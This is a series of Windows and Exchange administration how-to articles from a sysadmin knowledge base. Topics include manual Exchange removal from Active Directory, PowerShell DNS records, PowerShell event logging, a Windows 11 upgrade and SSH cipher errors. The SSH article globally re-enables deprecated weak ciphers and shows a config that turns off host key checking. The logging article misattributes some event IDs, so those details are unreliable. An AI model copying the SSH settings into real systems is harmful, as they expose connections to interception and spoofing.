Manually Remove Exchange

Manually Remove Exchange KB ID 0001907

Problem

There are several reasons why you might want to manually remove Exchange from Active Directory, for example.

Failed or Offline Exchange Server: If the Exchange Server is not starting, (or is completely offline), it might be necessary to remove it manually to clean up the environment.

Incomplete Uninstallation: Sometimes, the uninstallation doesn’t complete properly, leaving behind remnants that can cause issues.

Migration to a Newer Version: After migrating to a newer version of Exchange, or migrating to Office 365, you may need to remove old configurations to avoid problems.

Corruption: If the Exchange Server is corrupted or cannot be recovered, manual removal might be the only option.

Removing Old References: To ensure that no legacy references to the previous Exchange Server remain, which could interfere with new installations.

Solution Manually Remove Exchange

Before you start, ensure there are no remaining Exchange servers in your organization that rely on the one you are removing. If migrating to another Exchange server, verify mailboxes, connectors, and databases have been transferred properly.

Also consider trying to recover the Exchange server, and then removing it gracefully, or performing a migration.

Safely Remove Exchange

If you do not have access to the Exchange Management shell, and the server still exists, you can either mount the installation media for Exchange and use the following commands. Note: You do not actually need the media, if you locate the ‘bin‘ folder on your Exchange server you will find setup.exe* in there, and can run the uninstall command from that location.

*Note: Older versions of Exchange may need to use setup.com not setup.exe.

[box]

setup.exe /mode:uninstall

[/box]

Manually Remove Exchange Server

On a Domain controller Open ADSI Edit (adsiedit.msc) > Right-click ADSI Edit > Connect to… In “Select a well-known Naming Context,” choose Configuration> Click OK.

Navigate to CN=Configuration,DC=YourDomain,DC=com > CN=Services > CN=Microsoft Exchange > CN=First Organization > CN=Administrative Groups > CN=Exchange Administrative Group (FYDIBOHF23SPDLT) > CN=Servers.

Note: This assumes you have not manually named your, Exchange organisation or  administrative group something else.

Locate the offending Exchange server, and delete it

Repeat the above procedure but this time remove any databases that were hosted on the failed server.

Manually Remove Exchange Envrionment Completely

Now if you completely want to COMPLETELY remove Exchange* from your organisation, Delete the following,

Note: Dont do this if you still have live Exchange servers!

Delete: CN=Configuration,DC=YourDomain,DC=com > CN=Services > CN=Microsoft Exchange

Delete: CN=Configuration,DC=YourDomain,DC=com > CN=Services > CN=Microsoft Exchange AutoDiscover

Now connect ADSIEdit to the Default Naming Context.

Navigate to DC=YOUR-DOMAIN and locate

OU=Microsoft Exchange Security Groups
CN=Microsoft Exchange System Objects

Then delete them BOTH

 

On a domain controller, or a system that has the RSAT tools installed, launch Active Directory Users and Computers (dsa.msc). Navigate to your domain > Users. Then locate and delete the following objects.

  • DiscoverySearch Mailbox {GUID}
  • Exchange Online-ApplicationAccount
  • FederatedEmail.GUID
  • Migration.GUID
  • SystemMailbox {GUID}

Now whilst still in AD users and Computers. locate the Computer Object that represents the failed Exchange server and delete it. (Obviously if you are retaining the server for other purposes do not do this).

Note: If searching AD you will need to add in computers to the default search

Then remove the DNS entry in your DNS forward lookups zone (Check your reverse lookup zones and see if there’s a PTR record in there also that might need deleting).

IN SOME CASES, if you have deployed split DNS you may have entire zones that handle DNS addressing for you broken Exchange deployment, below is an example of what that may look like, these will also need to be removed.

Note: You may discover an autodiscover.your-domain forward lookup zone that also may need to be deleted.

Manually Delete Exchange From Registry

If you still have access to the server that’s failed, you can remove references to Exchange from its registry in the following locations.

HKEY_LOCAL_MACHINE > Software > Microsoft  > ExchangeServer.

HKEY_LOCAL_MACHINE > System > CurrentControlSet > Services > MSExchange* (there will be a LOT!)

If you have retained Exchange, and were simply removing a single failed Exchange Server, you other Exchange servers may have cached references to that failed Exchange server, you can restart the Microsoft Exchange Information Store (MSExchangeIS)  – Warning: This will dismount and remount the information stores, and may cause a popup on your Outlook clients. Or you can simply wait until the cache is refreshed.

 

Related Articles, References, Credits, or External Links

NA

PowerShell DNS Records (Creating)

 PowerShell DNS KB ID 0001906

Problem

You can use PowerShell to create DNS records in a Windows environment, this is typically on a Windows Server OS, that is running DNS services. Below are some  methods (depending on whether you’re managing an Active Directory-integrated DNS zone or a standalone DNS server) to do this.

Solution

PowerShell DNS: Creating an A Record (Host Record)

To add an A record (IPv4 address) to a DNS zone, use the following syntax.

[box]

Add-DnsServerResourceRecordA -Name "my-server" -ZoneName "pnl.com" -IPv4Address "192.168.100.101"

[/box]

PowerShell DNS: Creating an AAAA Record (IPv6 Host Record)

To add an A record (IPv4 address) to a DNS zone, use the following syntax.

[box]

Add-DnsServerResourceRecordAAAA -Name "my-server" -ZoneName "pnl.com" -IPv6Address "2001:db8::2"

[/box]

PowerShell DNS: Creating an CNAME Record (Cananonical Name Record)

To add an CNAME record (IPv4 address) to a DNS zone, use the following syntax.

[box]

Add-DnsServerResourceRecordCName -Name "www" -ZoneName "pnl.com" -HostNameAlias "my-server.pnl.com"

[/box]

PowerShell DNS: Creating an MX Record (Mail Exchange)

To add an MX record for mail delivery to a DNS zone, use the following syntax, Note: This will create an MX record with a priority of 10.

[box]

Add-DnsServerResourceRecordMX -ZoneName "pnl.com" -Name "@" -MailExchange "mail-01.pnl.com" -Preference 10

[/box]

PowerShell DNS: Creating an PTR Record (Reverse DNS)

To add an PTR record (or a reverse DNS lookup record) the following syntax, Note: Assumes you already have a reverse lookup zones created.

[box]

Add-DnsServerResourceRecordPTR -Name "101" -ZoneName "100.168.192.in-addr.arpa" -PtrDomainName "my-server.pnl.com"

[/box]

Note: This creates a PTR Record for 192.168.100.101 that points back to my-server.pnl.com.

PowerShell DNS: Creating an TXT Record (For SPF, DKIM, etc)

To add an TXT record use the following syntax.

[box]

Add-DnsServerResourceRecord -DescriptiveText "v=spf1 mx -all" -Name text -Txt -ZoneName pnl.com 

[/box]

Using PowerShell for DNS record creation helps streamline the administrative workload, improves consistency, and reduces the potential for errors, especially in larger environments. It’s an efficient, flexible, and scalable solution that can significantly enhance the management and automation of DNS infrastructure. Whether for one-off record creation or bulk updates, PowerShell is a powerful tool for IT administrators.

Related Articles, References, Credits, or External Links

Setting up the Correct DNS Records for your Web or Mail Server

Add-DnsServerResourceRecord

Windows Server 2025 Compression Options

2025 Compression KB ID 0001905

Problem

In Windows server 2025, you may see there are some more ‘compression’ options.

In previous versions of Windows server we simply had Send to > Compressed (Zippped) Folder. As you can see above we now have options for ZIP, 7z, and TAR File.

Solution : 2025 Compression

ZIP Files

The .zip file format is one of the most common archive formats in the world, widely used for compressing and packaging files. Developed in 1989 by Phil Katz (founder of PKWARE), .zip allows multiple files and directories to be bundled into a single file, reducing storage size and simplifying file sharing.

Key Features of .ZIP Files in 2025 Compression

Compression The .zip format uses lossless compression algorithms, most commonly Deflate, which means no data is lost during compression. Once extracted, the files retain their original quality and structure.

Archiving: .zip files can store multiple files and folder structures in a single package, making it easier to manage or share a group of files.

Password Protection: .zip files can include encryption (e.g., AES-256) to protect their contents with a password, useful for sensitive data.

Cross-Platform Support: Supported natively by most modern operating systems (e.g., Windows, macOS, and Linux), .zip files are widely recognized and easy to handle.

Splitting (Spanned Archives): Large .zip files can be split into smaller parts for easier distribution (e.g., email attachments).

How .ZIP Files Work

A .zip file contains the following key elements.

  • File Header: Contains metadata about each file (e.g., file name, size, timestamp).
  • Compressed Data Blocks: The actual compressed contents of the files.
  • Central Directory: A table of contents for all files in the archive, allowing quick access during extraction.
    End of Central Directory Record (EOCD): Marks the end of the archive, ensuring integrity.
Pros Cons
Reduces file size, saving disk space Compression ratio varies by file type (e.g., videos compress poorly)
Groups multiple files for easier sharing Does not support incremental updates like .tar.gz or .7z
Native support across platforms Password protection isn’t always secure without strong encryption

7z Files

The .7z file format is a high-compression archive format introduced in 1999 with the open-source 7-Zip software, developed by Igor Pavlov. Known for its impressive compression ratios and support for advanced features like strong encryption and multi-threading, .7z is a popular choice for power users and IT professionals.

Key Features of .7z Files in 2025 Compression

Superior Compression: .7z uses the LZMA (Lempel-Ziv-Markov chain algorithm) or its advanced version, LZMA2, which offers higher compression ratios compared to .zip and many other formats.

Multi-Format Support: .7z supports various compression, encryption, and pre-processing filters, making it highly versatile for different file types.

Strong Encryption: .7z files use AES-256 encryption for password protection, providing robust security for sensitive data.

Splitting (Volumes): Large .7z archives can be split into smaller parts (e.g., for storage on multiple media or sending via email).

Open-Source and Cross-Platform: While .7z isn’t natively supported by operating systems, free tools like 7-Zip and p7zip make it accessible on Windows, macOS, and Linux.

How .7z Files Work

A .7z file contains the following components:

  • Header: Stores metadata (e.g., file names, sizes, compression methods).
  • Compressed Data Blocks: The core data is compressed using the chosen algorithm (usually LZMA or LZMA2).
  • Encryption (Optional): Data and metadata can be encrypted for additional security.
Pros Cons
High compression ratio (saves more space) Used to Require third-party tools for extraction
Strong AES-256 encryption for security Slightly slower compression than .zip
Supports splitting for large files Not natively supported by OSs (less universal)
Open-source and free Advanced features may overwhelm casual users

TAR Files

The .tar file format, short for Tape Archive, is one of the oldest and most widely used formats for archiving files. Originally developed in the Unix ecosystem for storing files on magnetic tape, .tar remains popular today, especially in Linux environments, for grouping multiple files into a single archive.

Key Features of .TAR Files in 2025 Compression

Archiving, Not Compression: Unlike .zip or .7z, .tar files do not compress the contents—they simply bundle files and directories into a single archive for easier management.

Preserves File Metadata: .tar preserves essential file information, including permissions, ownership, timestamps, and symbolic links, making it ideal for backups and system migrations.

Streamable: Because .tar writes data sequentially, it can be used efficiently with pipes, enabling workflows like direct compression or streaming backups to remote locations.

Cross-Platform: While commonly associated with Unix/Linux, .tar files are supported on Windows and macOS via tools like WinRAR, 7-Zip, or native utilities.

How .TAR Files Work

A .tar file contains the following:

Headers: Metadata for each file (e.g., names, permissions, sizes).
File Data Blocks: The raw contents of the files, concatenated in the archive.
End Marker: Indicates the end of the archive.

Note: The .tar format does not include compression—it is often combined with compression algorithms like gzip or bzip2 to create compressed archives (e.g., .tar.gz, .tar.bz2).

Pros Cons
Ideal for archiving files with metadata intact Does not compress data (unless combined with gzip, etc.)
Simple and efficient for backups Sequential access: extracting specific files requires scanning the entire archive
Works seamlessly with Unix/Linux utilities No encryption or security by default

Comparing Server 2025 Compression Options

I’ve used a blend of files that can easily be compressed, and others that cannot to get a decent approximation of what you might expect. Remember .tar does not compress, so it’s more or less the size of the original folder.

Server 2025 Compress To > Additional Options

Using the last option you can select what format to go to, which method(s) to use and if you want to compress faster or smaller, you can gain some space, but the defaults are pretty good.

Related Articles, References, Credits, or External Links

NA

Can I delete Windows.old?

Can I delete Windows.old KB ID 0001904

Problem

The Windows.old folder is generated when you reinstall or upgrade Windows without formatting the drive. Here are some scenarios that would have create it.

Upgrading Windows: When you upgrade to a newer version of Windows (e.g., from Windows 10 to Windows 11), the system creates the Windows.old folder to back up your previous installation. This allows you to roll back to the earlier version if something goes wrong or if you’re not satisfied with the upgrade.
Reinstalling Windows: If you reinstall Windows without performing a clean installation (i.e., without formatting the drive), the system creates Windows.old to back up your previous installation, including your system files, installed programs, and personal data.
Windows Reset or Refresh: When you reset or refresh your PC, some versions of Windows (e.g., Windows 10/11) may create Windows.old to store your previous system state temporarily.
System Recovery: Performing a recovery operation (e.g., restoring from a recovery drive) without wiping the disk can also generate Windows.old.

The folder serves as a safety net to.

  • Roll back to the previous version of Windows (within 10 days for Windows 10/11).
  • Recover personal files or settings if needed.

So if you need drive space back or simply do not think you need it anymore, can you safely delete/removeit?

Solution

Yes, you can safely delete the Windows.old folder, but only if you’re sure you won’t need to revert to a previous version of Windows. Here’s what you need to know before deleting it:

Why Would You NOT Want to Delete Windows.old?

  • Revert to a previous version: You can use it to roll back to your old version of Windows within 10 days of the upgrade.
  • Recover personal files: If anything went missing during the upgrade, you might find it in Windows.old.

How to delete Windows.old safely

You can’t delete it like a normal folder. Use the Disk Cleanup tool:

Press Win + S and type Disk Cleanup, then select it.

Click Clean up system files.

Select Previous Windows Installation(s).

Click OK to delete it.

Related Articles, References, Credits, or External Links

NA

Logging Powershell Execution

Logging PowerShell KB ID 0001903

Problem

Monitoring PowerShell execution, (especially on critical servers like domain controllers), is essential for detecting potential malicious activity. PowerShell activities generate specific Event IDs in the Windows Event Log.

Solution : Logging Powershell

The following Event IDs are logged connected to PowerShell execution.

Command Line Auditing: Event ID 800 (Microsoft-Windows-Sysmon/Operational log) (if Sysmon is configured):

  • Logs command-line activity, including PowerShell commands.

Event ID 4102: PowerShell Transcription  (Microsoft-Windows-PowerShell/Operational log):

  • Tracks transcription-related activities if PowerShell transcription is enabled.

Event ID 4103: PowerShell Execution Logging (Microsoft-Windows-PowerShell/Operational log):

  • Provides detailed script block execution logs.
  • Useful for tracking command-line arguments and script contents.

Event ID 4104: Script Block Logging (Microsoft-Windows-PowerShell/Operational log):

  • Logs the actual script blocks being executed.
  • Often used to detect obfuscated or suspicious commands.

Event ID 4105: Module Logging (Microsoft-Windows-PowerShell/Operational log):

  • Tracks modules loaded by PowerShell scripts.

Event ID 4106: Pipeline Execution Details (Microsoft-Windows-PowerShell/Operational log):

  • Captures pipeline execution details, providing insights into commands executed in the pipeline.

Event ID 4688: Windows PowerShell Logs (Security log):

  • Logs when a new process is created, including PowerShell.
  • Look for processes with powershell.exe or pwsh.exe.

Logging Powershell With Group Policy

Enable Script Block Logging:

For LOCAL POLICY: Open gpedit.msc. > Navigate to: Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging > Set it to Enabled. Additionally tick script block invocation start/stop events, to enable the logging of Event 4105 (start of a script block execution) and 4106 (end of a script block execution).

 

For DOMAIN GROP POLICY: On a domain controller or a machine that has the management tool attached > Administrative tools > Group Policy Management Console, then either edit an existing, or create a new one linked to the domain/OU that contains the COMPUTER object you want to apply this policy to, then Navigate to Navigate to: Computer Configuration > Policies > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging > Set it to Enabled. Additionally tick script block invocation start/stop events, to enable the logging of Event 4105 (start of a script block execution) and 4106 (end of a script block execution).

Logging PowerShell (Other Options)

You may also want to enable the following policies (at either LOCAL or DOMAIN level)

Enable Module Logging

Location: Administrative Templates > Windows Components > Windows PowerShell.

Lets you log the usage of particular PowerShell Modules

Enable PowerShell Transcription

Location: Administrative Templates > Windows Components > Windows PowerShell.

This policy setting lets you capture the input and output of Windows PowerShell commands into text-based transcripts.

Audit Process Creation

Location: Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Detailed Tracking > Audit Process Creation > Enable for success and failiure.

This is  used to enable or disable the logging of process creation events in the Windows Security log. It provides valuable information about which processes are starting on a system, including details like the process name, command line arguments, and the user who initiated the process.

Don’t forget to either wait, or force a group policy update.

Related Articles, References, Credits, or External Links

NA

Upgrade Windows 10 to Windows 11

Upgrade Windows 10 to Windows 11 KB ID 0001902

Problem

As you may already know, Microsoft will officially end support for Windows 10 on October 14, 2025. This means no more security updates, bug fixes, or feature improvements! While your PC will still function, it will be at greater risk for viruses and malware – and yes – that does mean businesses and home users alike. So it’s crucial to start planning your transition to Windows 11 now, especially with larger estates.
Below, I’ll cover the key considerations and upgrade paths to help you prepare.

Need Help? If you’re unsure about your upgrade path or compatibility, feel free to leave a comment below.

Why Upgrade to Windows 11

Windows 11 offers several improvements over Windows 10, including:

  • Enhanced Security: Built-in support for TPM 2.0 and Secure Boot ensures a more secure operating system.
  • Modern UI: A fresh design with centred taskbar icons and rounded corners.
  • Productivity Features: Snap layouts, virtual desktops, and better multi-monitor support.
  • Improved Gaming Experience: DirectStorage and AutoHDR support.
  • Optimised for Hybrid Work: Deeper integration with Microsoft Teams and cloud services.

As mentioned (above) with support for Windows 10 ending, you’ll also reduce your risk of vulnerabilities by upgrading.

Solution Upgrade Windows 10 to Windows 11

Key Considerations Before Upgrading to Windows 11

Hardware Compatibility

Windows 11 has stricter hardware requirements than Windows 10. Your PC must meet the following criteria:

  • Processor: 1 GHz or faster, 2 or more cores, 64-bit compatible.
  • RAM: 4 GB minimum.
  • Storage: 64 GB or more.
  • TPM: Trusted Platform Module (TPM) version 2.0.
  • Graphics Card: DirectX 12 compatible with a WDDM 2.0 driver.
  • Display: At least 720p resolution and 9″ or larger diagonal screen size.

Run the PC Health Check Tool from Microsoft to verify if your system is compatible.

Software Compatibility

Check whether your existing software and drivers are compatible with Windows 11. Vendors are gradually releasing updates, but some legacy applications may not work as expected.

Backup your Data

Before upgrading, ensure all critical data is backed up to an external drive or cloud storage. While most upgrades are seamless, it’s better to err on the side of caution.

Upgrade Timing

For businesses, avoid upgrading during peak operational periods. Test Windows 11 on a subset of systems before a full rollout.

Licensing and Cost

If you have a valid Windows 10 license, the upgrade to Windows 11 is free. However, organizations with volume licensing may need to verify their agreements.

Upgrade Paths from Windows 10 to Windows 11 Paths

Option 1: In-Place Upgrade Windows 10 to Windows 11

An in-place upgrade allows you to install Windows 11 over your existing Windows 10 installation without losing data or applications.

Steps:

  1. Run the PC Health Check Tool to ensure compatibility.
  2. Open Windows Update (“Settings > Update & Security”).
  3. If your device is eligible, you’ll see the option to upgrade to Windows 11. Click “Download and Install.”

Option 2: Clean Installation Upgrade Windows 10 to Windows 11

A clean installation is a fresh start, which often results in better performance and fewer compatibility issues.

Steps:

  1. Download the Windows 11 installation media from the Microsoft website.
  2. Create a bootable USB drive using the Media Creation Tool.
  3. Boot from the USB drive and follow the on-screen instructions to install Windows 11.
  4. Restore your data and reinstall applications.

Option 3: Upgrade via IT Deployment Tools (Enterprise)

Organisations can use tools like Microsoft Endpoint Manager or Windows Autopilot to deploy Windows 11 to multiple devices seamlessly.

Steps:

  1. Assess hardware readiness using tools like Microsoft Endpoint Configuration Manager.
  2. Develop an upgrade strategy, including phased rollouts and testing.
  3. Use deployment tools to push the upgrade to target systems.

Upgrade Windows 10 to Windows 11 (Post deployment Checks)

  • Verify Drivers and Updates: After installation, check for driver updates via Windows Update or manufacturer’s websites.
  • Reconfigure Software: Test all critical applications to ensure they work correctly.
  • Enable New Features: Familiarize yourself and your team with productivity features like Snap layouts and widgets.
  • Educate Users: Provide training or resources for end-users transitioning to Windows 11.

With support for Windows 10 ending soon, transitioning to Windows 11 is essential to ensure your system remains secure and up-to-date. By planning carefully and understanding the upgrade paths, you can make the process as smooth as possible. Start by assessing your hardware and software readiness, then choose the upgrade route that best fits your needs.

Related Articles, References, Credits, or External Links

NA

RDP Issue Post Windows 11 24H2 Upgrade

RDP Issue KB ID 0001901

Problem: RDP Issue

Post updating Windows 11 to version 24H2, remote desktop connections to older systems i.e. running Windows 7 or Windows Server 2008 R2, encounter issues with displaying graphical content properly.

Reverting to the earlier version of Windows 11 RDP (23H2) does resolve the issue.

Connections to devices with newer operating systems remain unaffected.

Solution: RDP Issue

Note: You can simply use the RDP client from the MS Store and this should eliminate the problem,

The solution involves copying files form an older (23H2 or older) version of Windows, but first locate all the following files and RENAME them with a .OLD extension, to do this you will need to boot into safe mode, or from the recovery environment. Press and hold the Shift key while clicking Restart from the Start menu, Power menu, or the sign-in screen. Then the computer will reboot and enter the Recovery Mode.)

  • C:\Windows\System32\mstsc.exe
  • C:\Windows\System32\mstscax.dll
  • C:\Windows\System32\en-US\mstsc.exe.mui (en-US your locale may be different if you not using English US)
  • C:\Windows\System32\en-US\mstscax.dll.mui (en-US your locale may be different if you not using Engish US))
  • C:\Windows\SystemResources\mstsc.exe.mun
  • C:\Windows\SystemResources\mstscax.dll.mum

Copy those files back from a known working older system.

Related Articles, References, Credits, or External Links

NA

Windows SSH ‘No Matching Key’

No Matching Key KB ID 0001900

Problem : No Matching Key

Typically I see this problem on my mac or within various Linux distributions. I’ve covered extensively how to fix this on a mac in the following article.

macOS – SSH Error ‘No Matching Exchange Method Found’

So when I saw the same question asked for a Windows client, I went and looked, and found some patchy information, so I thought I’d work it out and post it here for you. Essentially you will see an error when attempting to SSH to a device something like one of the following.

Unable to negotiate with {IP-Or-Hostname} port 22 : no matching key exchange method found. Their offer: diffie-hellman-group1-sha1

Unable to negotiate with {IP-Or-Hostname} port 22 : no matching host key type found. Their offer: ssh-rsa

Solution : No Matching Key

With windows the fix is similar, less secure algorithms and ciphers have been depreciated by Windows, to re-enable them* you need to edit your ssh_config file this file lives in a folder called ssh, which is in a hidden folder on the root of your C Drive called ProgramData. On most Windows machines this file wont exist, but check first to make sure (particularly if you’re on a server that may be running SSH Services).

*Note: They are depreciated for a reason, this weakens your machines security. The following procedure will GLOBALLY allow these depreciated cyphers for all SSH sessions, if you want to operate a little more securely go to the individual SSH config section.

Showing Hidden Files and Folders : No Matching Key

Assuming like me you don’t already have an ssh_config file already then you need to create one and add the connection algorithms required. Open an administrative command window (if you don’t do this you will get access denied errors going forward!) Then execute the following commands.

[box]

copy nul > C:\ProgramData\ssh\ssh_config

notepad C:\ProgramData\ssh\ssh_config

[/box]

Note: If after you execute the first command, you get “copy : Cannot find path ‘C:\Windows\system32\nul’ because it does not exist.” don’t worry, it will still create the file.

A notepad window will open, remove any text withing it and paste in the following.

[box]

MACs hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96,hmac-sha2-256,hmac-sha2-512
KexAlgorithms diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1
PubkeyAcceptedAlgorithms +ssh-rsa
HostKeyAlgorithms +ssh-rsa

[/box]

Save the notepad file then re-try your ssh command, this time it should succeed, or if it errors it will tell you which MAC, KexAlgorithms, or Key algorithm it’s missing that you can paste into the ssh_config file.

Individual Host SSH Settings

Its considered better practice to have a config for each target you will SSH to, for me that’s impractical because I have hundreds of clients and thousands of switches, routers and firewalls. (but you could add them as you go, I suppose). For this procedure you create a config file in your user profile, and in that config file you put the requirements in, on a host-by-host basis.

Firstly create the config file, open an administrative PowerShell window, and execute the following command.

[box]

New-Item -Path $HOME\.ssh\config -ItemType File

[/box]

Then to edit the config file.

[box]

C:\WINDOWS\System32\notepad.exe $HOME\.ssh\config

[/box]

A Notepad window will open with the blank config file, here’s an example of a config for two devices (my test Cisco ASA, and my test core switch).

Example.

[box]

# Config for my test firewall
  Host cisco-asa
  HostName 192.168.254.254
  User petelong
  Port 22
  StrictHostKeyChecking no
  UserKnownHostsFile /dev/null
  KexAlgorithms diffie-hellman-group1-sha1
  HostKeyAlgorithms +ssh-rsa

[/box]

Now simply issue an ssh cisco-asa command.

 

Related Articles, References, Credits, or External Links

SSH: Host Identification Has Changed

Printers “Some Of These Settings are Managed By Your Organisation”

Managed By Your Organisation KB ID 0001899

Problem

When attempting to add a printer, or engage with the printer settings dialog, you may see.

Some Of These Settings are Managed By Your Organisation

Solution : Managed By Your Organisation

This is usually because a policy is being applied, (or has been applied) that is making a change in your registry, to the following key.

[box]

HKEY_CURRENT_USER > Software > Microsoft > Windows > CurrentVersion > Policies > Explorer > NoAddPrinter 

[/box]

Values are.

  • ENABLED  = 1 (Printers cannot be added).
  • DISABLED = 0 (Printers can be added).

Of course if this IS being enforced by group policy changing the registry key will only fix the problem until the policy is re applied!

I’ve previously written about how to locate where a group policy is coming from. the policy you are looking for is

[box]

User Configuration > Administrative Templates > Control Panel > Printers > Prevent addition of printers  

[/box]

In this case it was being enforced by Local User Policies

Running gpedit.msc got me to the culprit.

If yours is being enforced from your domain, gpresult will point to the correct policy.

Related Articles, References, Credits, or External Links

Allow Users to Install Printers with Group Policy

Deploying Printers with Group Policy Preferences

What GPO are Applied?

What GPO KB ID 0001898

Problem

There are a number of reasons for you to test and demonstrate group policy application. Recently on Experts Exchange there was a question. where a user could not add a printer because those settings were “Controlled by their organisation’ but was pretty sure no printer GPOs were applied.

Or you may simply be setting up a new GPO and it’s not applying, or not working as you would expect.

Solution : What GPO

I’ve been doing this a long time! Back in the day you could create a new MMC console (run mmc.exe) then add the “Resultant Set Of Policy” Snap in and rung that to evaluate and model different GPO applications and results. You can still do that but now you can simply run the RSOP command from an administrative command window.

In this case it will produce a list of applied group policies for the logged in user and the machine it was ran on (if you want results for differennt users or computers you can add the RSOP snap-in to mmc, or run the modelling from a machinesthat had the group policy management console installed)

But RSOP will give you output like this, you can see what policies are being applied, and what is the name of the group policy that applying that change.

But this will produce a complete list of all GPO settings and their status (even if they are not defined (see above)). An easier way to search is to use GPRESULT and send the output of that to an HTML file that you can open in a browser.

[box]

gpresult /h C:\{Path}\GPresult.htm

[/box]

This produces an easier to read report

You can get the same report and change the input parameters for users and computers etc, by running the Group Policy Results wizard that included with the AD DS RSAT tools

Related Articles, References, Credits, or External Links

Group Policy: Item-Level Targeting

Apply Group Policy To a Security Group

Add The ‘Group Policy Management Console’